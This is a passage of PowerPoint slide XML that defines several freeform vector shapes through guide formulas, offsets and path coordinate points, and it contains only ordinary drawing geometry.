                  <a:gd name="T41" fmla="*/ 0 h 71"/>
                  <a:gd name="T42" fmla="*/ 0 w 188"/>
                  <a:gd name="T43" fmla="*/ 0 h 71"/>
                  <a:gd name="T44" fmla="*/ 0 w 188"/>
                  <a:gd name="T45" fmla="*/ 0 h 71"/>
                  <a:gd name="T46" fmla="*/ 0 w 188"/>
                  <a:gd name="T47" fmla="*/ 0 h 71"/>
                  <a:gd name="T48" fmla="*/ 0 w 188"/>
                  <a:gd name="T49" fmla="*/ 0 h 71"/>
                  <a:gd name="T50" fmla="*/ 0 w 188"/>
                  <a:gd name="T51" fmla="*/ 0 h 71"/>
                  <a:gd name="T52" fmla="*/ 0 w 188"/>
                  <a:gd name="T53" fmla="*/ 0 h 71"/>
                  <a:gd name="T54" fmla="*/ 0 w 188"/>
                  <a:gd name="T55" fmla="*/ 0 h 71"/>
                  <a:gd name="T56" fmla="*/ 0 w 188"/>
                  <a:gd name="T57" fmla="*/ 0 h 71"/>
                  <a:gd name="T58" fmla="*/ 0 w 188"/>
                  <a:gd name="T59" fmla="*/ 0 h 71"/>
                  <a:gd name="T60" fmla="*/ 0 w 188"/>
                  <a:gd name="T61" fmla="*/ 0 h 71"/>
                  <a:gd name="T62" fmla="*/ 0 w 188"/>
                  <a:gd name="T63" fmla="*/ 0 h 71"/>
                  <a:gd name="T64" fmla="*/ 0 w 188"/>
                  <a:gd name="T65" fmla="*/ 0 h 71"/>
                  <a:gd name="T66" fmla="*/ 0 w 188"/>
                  <a:gd name="T67" fmla="*/ 0 h 71"/>
                  <a:gd name="T68" fmla="*/ 0 w 188"/>
                  <a:gd name="T69" fmla="*/ 0 h 71"/>
                  <a:gd name="T70" fmla="*/ 0 w 188"/>
                  <a:gd name="T71" fmla="*/ 0 h 71"/>
                  <a:gd name="T72" fmla="*/ 0 w 188"/>
                  <a:gd name="T73" fmla="*/ 0 h 71"/>
                  <a:gd name="T74" fmla="*/ 0 w 188"/>
                  <a:gd name="T75" fmla="*/ 0 h 71"/>
                  <a:gd name="T76" fmla="*/ 0 w 188"/>
                  <a:gd name="T77" fmla="*/ 0 h 71"/>
                  <a:gd name="T78" fmla="*/ 0 w 188"/>
                  <a:gd name="T79" fmla="*/ 0 h 71"/>
                  <a:gd name="T80" fmla="*/ 0 w 188"/>
                  <a:gd name="T81" fmla="*/ 0 h 71"/>
                  <a:gd name="T82" fmla="*/ 0 w 188"/>
                  <a:gd name="T83" fmla="*/ 0 h 71"/>
                  <a:gd name="T84" fmla="*/ 0 w 188"/>
                  <a:gd name="T85" fmla="*/ 0 h 71"/>
                  <a:gd name="T86" fmla="*/ 0 w 188"/>
                  <a:gd name="T87" fmla="*/ 0 h 71"/>
                  <a:gd name="T88" fmla="*/ 0 w 188"/>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8"/>
                  <a:gd name="T136" fmla="*/ 0 h 71"/>
                  <a:gd name="T137" fmla="*/ 188 w 188"/>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8" h="71">
                    <a:moveTo>
                      <a:pt x="2" y="52"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="8" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="133" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="183" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="188" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="187" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="185" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="182" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="162" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="52"/>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180" name="Freeform 107"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="456" y="2567"/>
                <a:ext cx="22" cy="7"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 65"/>
                  <a:gd name="T1" fmla="*/ 0 h 23"/>
                  <a:gd name="T2" fmla="*/ 0 w 65"/>
                  <a:gd name="T3" fmla="*/ 0 h 23"/>
                  <a:gd name="T4" fmla="*/ 0 w 65"/>
                  <a:gd name="T5" fmla="*/ 0 h 23"/>
                  <a:gd name="T6" fmla="*/ 0 w 65"/>
                  <a:gd name="T7" fmla="*/ 0 h 23"/>
                  <a:gd name="T8" fmla="*/ 0 w 65"/>
                  <a:gd name="T9" fmla="*/ 0 h 23"/>
                  <a:gd name="T10" fmla="*/ 0 w 65"/>
                  <a:gd name="T11" fmla="*/ 0 h 23"/>
                  <a:gd name="T12" fmla="*/ 0 w 65"/>
                  <a:gd name="T13" fmla="*/ 0 h 23"/>
                  <a:gd name="T14" fmla="*/ 0 w 65"/>
                  <a:gd name="T15" fmla="*/ 0 h 23"/>
                  <a:gd name="T16" fmla="*/ 0 w 65"/>
                  <a:gd name="T17" fmla="*/ 0 h 23"/>
                  <a:gd name="T18" fmla="*/ 0 w 65"/>
                  <a:gd name="T19" fmla="*/ 0 h 23"/>
                  <a:gd name="T20" fmla="*/ 0 w 65"/>
                  <a:gd name="T21" fmla="*/ 0 h 23"/>
                  <a:gd name="T22" fmla="*/ 0 w 65"/>
                  <a:gd name="T23" fmla="*/ 0 h 23"/>
                  <a:gd name="T24" fmla="*/ 0 w 65"/>
                  <a:gd name="T25" fmla="*/ 0 h 23"/>
                  <a:gd name="T26" fmla="*/ 0 w 65"/>
                  <a:gd name="T27" fmla="*/ 0 h 23"/>
                  <a:gd name="T28" fmla="*/ 0 w 65"/>
                  <a:gd name="T29" fmla="*/ 0 h 23"/>
                  <a:gd name="T30" fmla="*/ 0 w 65"/>
                  <a:gd name="T31" fmla="*/ 0 h 23"/>
                  <a:gd name="T32" fmla="*/ 0 w 65"/>
                  <a:gd name="T33" fmla="*/ 0 h 23"/>
                  <a:gd name="T34" fmla="*/ 0 w 65"/>
                  <a:gd name="T35" fmla="*/ 0 h 23"/>
                  <a:gd name="T36" fmla="*/ 0 w 65"/>
                  <a:gd name="T37" fmla="*/ 0 h 23"/>
                  <a:gd name="T38" fmla="*/ 0 w 65"/>
                  <a:gd name="T39" fmla="*/ 0 h 23"/>
                  <a:gd name="T40" fmla="*/ 0 w 65"/>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3"/>
                  <a:gd name="T65" fmla="*/ 65 w 65"/>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3">
                    <a:moveTo>
                      <a:pt x="0" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="3" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="62" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0"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181" name="Freeform 108"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="383" y="2461"/>
                <a:ext cx="11" cy="9"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 31"/>
                  <a:gd name="T1" fmla="*/ 0 h 28"/>
                  <a:gd name="T2" fmla="*/ 0 w 31"/>
                  <a:gd name="T3" fmla="*/ 0 h 28"/>
                  <a:gd name="T4" fmla="*/ 0 w 31"/>
                  <a:gd name="T5" fmla="*/ 0 h 28"/>
                  <a:gd name="T6" fmla="*/ 0 w 31"/>
                  <a:gd name="T7" fmla="*/ 0 h 28"/>
                  <a:gd name="T8" fmla="*/ 0 w 31"/>
                  <a:gd name="T9" fmla="*/ 0 h 28"/>
                  <a:gd name="T10" fmla="*/ 0 w 31"/>
                  <a:gd name="T11" fmla="*/ 0 h 28"/>
                  <a:gd name="T12" fmla="*/ 0 w 31"/>
                  <a:gd name="T13" fmla="*/ 0 h 28"/>
                  <a:gd name="T14" fmla="*/ 0 w 31"/>
                  <a:gd name="T15" fmla="*/ 0 h 28"/>
                  <a:gd name="T16" fmla="*/ 0 w 31"/>
                  <a:gd name="T17" fmla="*/ 0 h 28"/>
                  <a:gd name="T18" fmla="*/ 0 w 31"/>
                  <a:gd name="T19" fmla="*/ 0 h 28"/>
                  <a:gd name="T20" fmla="*/ 0 w 31"/>
                  <a:gd name="T21" fmla="*/ 0 h 28"/>
                  <a:gd name="T22" fmla="*/ 0 w 31"/>
                  <a:gd name="T23" fmla="*/ 0 h 28"/>
                  <a:gd name="T24" fmla="*/ 0 w 31"/>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28"/>
                  <a:gd name="T41" fmla="*/ 31 w 31"/>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28">
                    <a:moveTo>
                      <a:pt x="21" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="25" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21"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182" name="Freeform 109"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="349" y="2396"/>
                <a:ext cx="57" cy="24"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 176"/>
                  <a:gd name="T1" fmla="*/ 0 h 72"/>
                  <a:gd name="T2" fmla="*/ 0 w 176"/>
                  <a:gd name="T3" fmla="*/ 0 h 72"/>
                  <a:gd name="T4" fmla="*/ 0 w 176"/>
                  <a:gd name="T5" fmla="*/ 0 h 72"/>
                  <a:gd name="T6" fmla="*/ 0 w 176"/>
                  <a:gd name="T7" fmla="*/ 0 h 72"/>
                  <a:gd name="T8" fmla="*/ 0 w 176"/>
                  <a:gd name="T9" fmla="*/ 0 h 72"/>
                  <a:gd name="T10" fmla="*/ 0 w 176"/>
                  <a:gd name="T11" fmla="*/ 0 h 72"/>
                  <a:gd name="T12" fmla="*/ 0 w 176"/>
                  <a:gd name="T13" fmla="*/ 0 h 72"/>
                  <a:gd name="T14" fmla="*/ 0 w 176"/>
                  <a:gd name="T15" fmla="*/ 0 h 72"/>
                  <a:gd name="T16" fmla="*/ 0 w 176"/>
                  <a:gd name="T17" fmla="*/ 0 h 72"/>
                  <a:gd name="T18" fmla="*/ 0 w 176"/>
                  <a:gd name="T19" fmla="*/ 0 h 72"/>
                  <a:gd name="T20" fmla="*/ 0 w 176"/>
                  <a:gd name="T21" fmla="*/ 0 h 72"/>
                  <a:gd name="T22" fmla="*/ 0 w 176"/>
                  <a:gd name="T23" fmla="*/ 0 h 72"/>
                  <a:gd name="T24" fmla="*/ 0 w 176"/>
                  <a:gd name="T25" fmla="*/ 0 h 72"/>
                  <a:gd name="T26" fmla="*/ 0 w 176"/>
                  <a:gd name="T27" fmla="*/ 0 h 72"/>
                  <a:gd name="T28" fmla="*/ 0 w 176"/>
                  <a:gd name="T29" fmla="*/ 0 h 72"/>
                  <a:gd name="T30" fmla="*/ 0 w 176"/>
                  <a:gd name="T31" fmla="*/ 0 h 72"/>
                  <a:gd name="T32" fmla="*/ 0 w 176"/>
                  <a:gd name="T33" fmla="*/ 0 h 72"/>
                  <a:gd name="T34" fmla="*/ 0 w 176"/>
                  <a:gd name="T35" fmla="*/ 0 h 72"/>
                  <a:gd name="T36" fmla="*/ 0 w 176"/>
                  <a:gd name="T37" fmla="*/ 0 h 72"/>
                  <a:gd name="T38" fmla="*/ 0 w 176"/>
                  <a:gd name="T39" fmla="*/ 0 h 72"/>
                  <a:gd name="T40" fmla="*/ 0 w 176"/>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6"/>
                  <a:gd name="T64" fmla="*/ 0 h 72"/>
                  <a:gd name="T65" fmla="*/ 176 w 176"/>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6" h="72">
                    <a:moveTo>
                      <a:pt x="170" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="172" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="175" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="176" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="176" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="119" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="115" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="162" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="170"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183" name="Freeform 110"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="300" y="2474"/>
                <a:ext cx="10" cy="24"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 31"/>
                  <a:gd name="T1" fmla="*/ 0 h 71"/>
                  <a:gd name="T2" fmla="*/ 0 w 31"/>
                  <a:gd name="T3" fmla="*/ 0 h 71"/>
                  <a:gd name="T4" fmla="*/ 0 w 31"/>
                  <a:gd name="T5" fmla="*/ 0 h 71"/>
                  <a:gd name="T6" fmla="*/ 0 w 31"/>
                  <a:gd name="T7" fmla="*/ 0 h 71"/>
                  <a:gd name="T8" fmla="*/ 0 w 31"/>
                  <a:gd name="T9" fmla="*/ 0 h 71"/>
                  <a:gd name="T10" fmla="*/ 0 w 31"/>
                  <a:gd name="T11" fmla="*/ 0 h 71"/>
                  <a:gd name="T12" fmla="*/ 0 w 31"/>
                  <a:gd name="T13" fmla="*/ 0 h 71"/>
                  <a:gd name="T14" fmla="*/ 0 w 31"/>
                  <a:gd name="T15" fmla="*/ 0 h 71"/>
                  <a:gd name="T16" fmla="*/ 0 w 31"/>
                  <a:gd name="T17" fmla="*/ 0 h 71"/>
                  <a:gd name="T18" fmla="*/ 0 w 31"/>
                  <a:gd name="T19" fmla="*/ 0 h 71"/>
                  <a:gd name="T20" fmla="*/ 0 w 31"/>
                  <a:gd name="T21" fmla="*/ 0 h 71"/>
                  <a:gd name="T22" fmla="*/ 0 w 31"/>
                  <a:gd name="T23" fmla="*/ 0 h 71"/>
                  <a:gd name="T24" fmla="*/ 0 w 31"/>
                  <a:gd name="T25" fmla="*/ 0 h 71"/>
                  <a:gd name="T26" fmla="*/ 0 w 31"/>
                  <a:gd name="T27" fmla="*/ 0 h 71"/>
                  <a:gd name="T28" fmla="*/ 0 w 31"/>
                  <a:gd name="T29" fmla="*/ 0 h 71"/>
                  <a:gd name="T30" fmla="*/ 0 w 31"/>
                  <a:gd name="T31" fmla="*/ 0 h 71"/>
                  <a:gd name="T32" fmla="*/ 0 w 31"/>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71"/>
                  <a:gd name="T53" fmla="*/ 31 w 31"/>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71">
                    <a:moveTo>
                      <a:pt x="0" y="69"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="71"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="69"/>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184" name="Freeform 111"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="309" y="2499"/>
                <a:ext cx="23" cy="22"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 72"/>
                  <a:gd name="T1" fmla="*/ 0 h 70"/>
                  <a:gd name="T2" fmla="*/ 0 w 72"/>
                  <a:gd name="T3" fmla="*/ 0 h 70"/>
                  <a:gd name="T4" fmla="*/ 0 w 72"/>
                  <a:gd name="T5" fmla="*/ 0 h 70"/>
                  <a:gd name="T6" fmla="*/ 0 w 72"/>
                  <a:gd name="T7" fmla="*/ 0 h 70"/>
                  <a:gd name="T8" fmla="*/ 0 w 72"/>
                  <a:gd name="T9" fmla="*/ 0 h 70"/>
                  <a:gd name="T10" fmla="*/ 0 w 72"/>
                  <a:gd name="T11" fmla="*/ 0 h 70"/>
                  <a:gd name="T12" fmla="*/ 0 w 72"/>
                  <a:gd name="T13" fmla="*/ 0 h 70"/>
                  <a:gd name="T14" fmla="*/ 0 w 72"/>
                  <a:gd name="T15" fmla="*/ 0 h 70"/>
                  <a:gd name="T16" fmla="*/ 0 w 72"/>
                  <a:gd name="T17" fmla="*/ 0 h 70"/>
                  <a:gd name="T18" fmla="*/ 0 w 72"/>
                  <a:gd name="T19" fmla="*/ 0 h 70"/>
                  <a:gd name="T20" fmla="*/ 0 w 72"/>
                  <a:gd name="T21" fmla="*/ 0 h 70"/>
                  <a:gd name="T22" fmla="*/ 0 w 72"/>
                  <a:gd name="T23" fmla="*/ 0 h 70"/>
                  <a:gd name="T24" fmla="*/ 0 w 72"/>
                  <a:gd name="T25" fmla="*/ 0 h 70"/>
                  <a:gd name="T26" fmla="*/ 0 w 72"/>
                  <a:gd name="T27" fmla="*/ 0 h 70"/>
                  <a:gd name="T28" fmla="*/ 0 w 72"/>
                  <a:gd name="T29" fmla="*/ 0 h 70"/>
                  <a:gd name="T30" fmla="*/ 0 w 72"/>
                  <a:gd name="T31" fmla="*/ 0 h 70"/>
                  <a:gd name="T32" fmla="*/ 0 w 72"/>
                  <a:gd name="T33" fmla="*/ 0 h 70"/>
                  <a:gd name="T34" fmla="*/ 0 w 72"/>
                  <a:gd name="T35" fmla="*/ 0 h 70"/>
                  <a:gd name="T36" fmla="*/ 0 w 72"/>
                  <a:gd name="T37" fmla="*/ 0 h 70"/>
                  <a:gd name="T38" fmla="*/ 0 w 72"/>
                  <a:gd name="T39" fmla="*/ 0 h 70"/>
                  <a:gd name="T40" fmla="*/ 0 w 72"/>
                  <a:gd name="T41" fmla="*/ 0 h 70"/>
                  <a:gd name="T42" fmla="*/ 0 w 72"/>
                  <a:gd name="T43" fmla="*/ 0 h 70"/>
                  <a:gd name="T44" fmla="*/ 0 w 72"/>
                  <a:gd name="T45" fmla="*/ 0 h 70"/>
                  <a:gd name="T46" fmla="*/ 0 w 72"/>
                  <a:gd name="T47" fmla="*/ 0 h 70"/>
                  <a:gd name="T48" fmla="*/ 0 w 72"/>
                  <a:gd name="T49" fmla="*/ 0 h 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70"/>
                  <a:gd name="T77" fmla="*/ 72 w 72"/>
                  <a:gd name="T78" fmla="*/ 70 h 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70">
                    <a:moveTo>
                      <a:pt x="19" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="22" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="64" y="70"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60" y="67"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="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185" name="Freeform 112"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="310" y="2485"/>
                <a:ext cx="5" cy="9"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 16"/>
                  <a:gd name="T1" fmla="*/ 0 h 30"/>
                  <a:gd name="T2" fmla="*/ 0 w 16"/>
                  <a:gd name="T3" fmla="*/ 0 h 30"/>
                  <a:gd name="T4" fmla="*/ 0 w 16"/>
                  <a:gd name="T5" fmla="*/ 0 h 30"/>
                  <a:gd name="T6" fmla="*/ 0 w 16"/>
                  <a:gd name="T7" fmla="*/ 0 h 30"/>
                  <a:gd name="T8" fmla="*/ 0 w 16"/>
                  <a:gd name="T9" fmla="*/ 0 h 30"/>
                  <a:gd name="T10" fmla="*/ 0 w 16"/>
                  <a:gd name="T11" fmla="*/ 0 h 30"/>
                  <a:gd name="T12" fmla="*/ 0 w 16"/>
                  <a:gd name="T13" fmla="*/ 0 h 30"/>
                  <a:gd name="T14" fmla="*/ 0 w 16"/>
                  <a:gd name="T15" fmla="*/ 0 h 30"/>
                  <a:gd name="T16" fmla="*/ 0 w 16"/>
                  <a:gd name="T17" fmla="*/ 0 h 30"/>
                  <a:gd name="T18" fmla="*/ 0 w 16"/>
                  <a:gd name="T19" fmla="*/ 0 h 30"/>
                  <a:gd name="T20" fmla="*/ 0 w 16"/>
                  <a:gd name="T21" fmla="*/ 0 h 30"/>
                  <a:gd name="T22" fmla="*/ 0 w 16"/>
                  <a:gd name="T23" fmla="*/ 0 h 30"/>
                  <a:gd name="T24" fmla="*/ 0 w 16"/>
                  <a:gd name="T25" fmla="*/ 0 h 30"/>
                  <a:gd name="T26" fmla="*/ 0 w 16"/>
                  <a:gd name="T27" fmla="*/ 0 h 30"/>
                  <a:gd name="T28" fmla="*/ 0 w 16"/>
                  <a:gd name="T29" fmla="*/ 0 h 30"/>
                  <a:gd name="T30" fmla="*/ 0 w 16"/>
                  <a:gd name="T31" fmla="*/ 0 h 30"/>
                  <a:gd name="T32" fmla="*/ 0 w 16"/>
                  <a:gd name="T33" fmla="*/ 0 h 30"/>
                  <a:gd name="T34" fmla="*/ 0 w 16"/>
                  <a:gd name="T35" fmla="*/ 0 h 30"/>
                  <a:gd name="T36" fmla="*/ 0 w 16"/>
                  <a:gd name="T37" fmla="*/ 0 h 30"/>
                  <a:gd name="T38" fmla="*/ 0 w 16"/>
